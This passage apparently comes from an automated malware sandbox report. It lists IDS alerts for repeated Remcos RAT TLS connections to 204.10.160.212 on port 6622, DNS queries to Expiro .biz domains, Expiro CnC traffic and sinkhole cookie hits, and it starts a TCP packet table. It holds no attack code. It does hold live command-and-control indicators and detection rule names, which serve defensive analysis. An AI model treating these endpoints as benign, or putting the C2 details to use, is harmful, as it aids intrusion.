                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:23.430139+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449766204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:25.925867+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449767204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:28.424142+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449769204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:31.215454+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449771204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:33.688508+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449772204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:36.208426+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449774204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:39.852780+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449783204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:39.943894+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.449789TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:39.943894+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.449789TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:40.146546+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.449790TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:40.146546+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.449790TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:42.364010+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449804204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:44.385830+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.449828TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:44.385830+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.449828TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:44.882900+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449823204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:44.960418+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.449835TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:44.960418+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.449835TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:47.380482+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449845204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:50.660540+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.449872TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:50.660540+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.449872TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:50.660648+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449871204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:51.300193+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.449883TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:51.300193+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.449883TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:53.318018+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449891204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:55.811449+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449912204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:58.303982+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449933204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.779947+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449956204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.825835+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.449963TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.825835+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.449963TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.949795+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.213.104.8680192.168.2.449966TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.949795+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.213.104.8680192.168.2.449966TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:03.288853+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449978204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:04.863924+02002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44999818.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:05.808726+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449997204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:08.282216+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450016204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:10.750660+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450037204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:13.218937+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450059204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:15.709046+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450077204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:18.210532+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450096204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:20.709019+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450115204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:20.912788+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.450123TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:20.912788+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.450123TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:23.140948+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450136204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:25.582997+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450143204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:27.146473+02002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.4601551.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:28.241267+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450148204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:30.615404+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450153204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:32.958174+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450157204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:35.268925+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450162204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:37.586267+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450168204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:39.730141+02002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.4556841.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:39.902521+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450175204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:42.113325+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450181204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:44.300850+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450187204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:44.367043+02002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.4581041.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:46.494672+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450192204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:48.650001+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450198204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:50.469266+02002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.4539391.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:51.137660+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450201204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:53.345689+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450205204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:55.457123+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450209204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:57.548989+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450215204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:59.621390+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450218204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:01.698073+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450221204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:02.236163+02002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.4492651.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:02.257670+02002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.4492651.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:03.705202+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450226204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:05.317102+02002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.45023518.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:05.415429+02002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.4590491.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:05.708880+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450233204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:07.688886+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450239204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:09.662973+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450244204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:11.184242+02002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.4593741.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:11.637453+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450249204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:15.325227+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450255204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:17.258612+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450261204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:19.142709+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450267204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:19.712219+02002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.4530601.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:19.739111+02002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.4530601.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:19.935528+02002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.4625801.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:19.957787+02002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.4625801.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:20.973754+02002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.4625801.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:21.082418+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450273204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:22.974713+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450277204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:24.851571+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450280204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:26.897213+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450285204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:28.962688+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450288204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:30.784491+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450291204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:32.605724+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450297204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:34.888556+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450303204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:36.694367+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450310204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:37.890251+02002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4611941.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:38.493326+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450313204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:38.939328+02002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4585291.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:40.290648+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450319204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:42.070723+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450324204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:43.848396+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450327204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:44.526136+02002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.4492621.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:45.633959+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450331204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:47.428905+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450334204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:49.159065+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450337204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:50.900226+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450340204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:52.618787+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450344204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:54.317039+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456516204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:56.003026+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456521204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:58.116800+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456524204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:59.814778+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456526204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:00.404573+02002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4560681.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:01.420227+02002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4537611.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:01.525387+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456529204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:03.189218+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456534204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:04.868931+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456536204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:06.992236+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456538204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:08.698794+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456540204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:10.352292+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456541204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:10.411079+02002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.45653982.112.184.19780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:12.025193+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456543204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:13.670110+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456544204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:15.299944+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456545204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:16.907636+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456547204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:18.533080+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456548204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:20.720404+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456549204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:22.355554+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456550204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:23.954810+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456551204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:25.548822+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456553204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:27.186498+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456554204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:28.767697+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456555204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:30.392544+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456556204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:31.997961+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456557204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:33.602793+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456558204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:35.235008+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456559204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:36.798716+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456560204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:38.384997+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456562204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:39.942786+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456565204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:41.526900+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456567204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:43.103667+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456569204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:44.681258+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456573204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:46.238828+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456577204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:47.785898+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456580204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:49.330624+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456584204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:50.919135+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456587204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:52.493302+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456590204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:54.170938+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456593204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:55.706849+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456596204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:57.240661+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456598204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:31:59.745594+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456602204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:03.009052+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456603204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:05.511413+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456604204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:08.029545+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456606204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:10.526331+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456607204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:32:13.022007+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.456608204.10.160.2126622TCP

                                                                                                                                                                                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:55.279186010 CEST497306622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:55.284368992 CEST662249730204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:55.284455061 CEST497306622192.168.2.4204.10.160.212
